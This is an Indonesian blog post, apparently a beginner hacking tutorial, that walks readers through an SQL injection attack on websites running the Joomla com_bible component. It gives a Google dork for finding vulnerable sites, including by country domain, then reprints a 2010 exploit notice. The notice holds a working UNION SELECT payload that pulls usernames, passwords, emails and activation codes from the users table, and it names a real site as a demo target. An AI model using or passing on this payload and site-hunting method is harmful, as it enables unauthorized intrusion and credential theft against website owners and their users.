coba bayangkan, saking mudahnya sampai di sebut bagi Pemalas,hihihi
sebelumnya saya mohon maaf kepada para master karena info ini sangatlah jadul, namun saya hanya ingin berbagi, kepada newbie2 seperti saya ini,
info yang ingin saya share kali ini adalah menyangkut ttg " SQL Injection joomla exploit vulnerability"
oke, tanpa basa basi lagi,
contoh exploit pada : com_bible .
oke,
langkah pertama yang kita lakukan mencari sebuah web yang kita duga bisa kita inject.
buka http://google.com kemudian ketikkan inurl:"/index.php?option=com_bible"
nah, jika kita menginginkan untuk hack suatu web dari negara tertentu, maka tambahkan site:[jenis domain suatu negara]
inurl:"/index.php?option=com_bible" kemudian tekan enter
setelah itu kita akan di bawa keu sebuah halaman yang menampilkan web2 terkandung component bible pada joomla,
pilih salah satu web nya,
nah, sekarang saya akan memberikan bentuk contoh exploitnya:
[!] ===========================================================================[!]
[~] Joomla com_bible SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Dork : aura_kasih=p~
[!]===========================================================================[!]
[ Vulnerable File ]
http://site/index.php?option=com_bible&book=1&chapter=[INDONESIANCODER]
[ XpL ]
/index.php?option=com_bible&book=1&chapter=-50/**/UNION/**/SELECT/**/1,2,group_concat(username,03a,password,03a,email,03a,activation,03c62723e),4,5/**/FROM/**/mos_users
or
another columns
[ d3m0 ]
http://www.throughfaith.org//index.php?o...s_users
etc etc etc ;]
[!]===========================================================================[!]
0 komentar:
Posting Komentar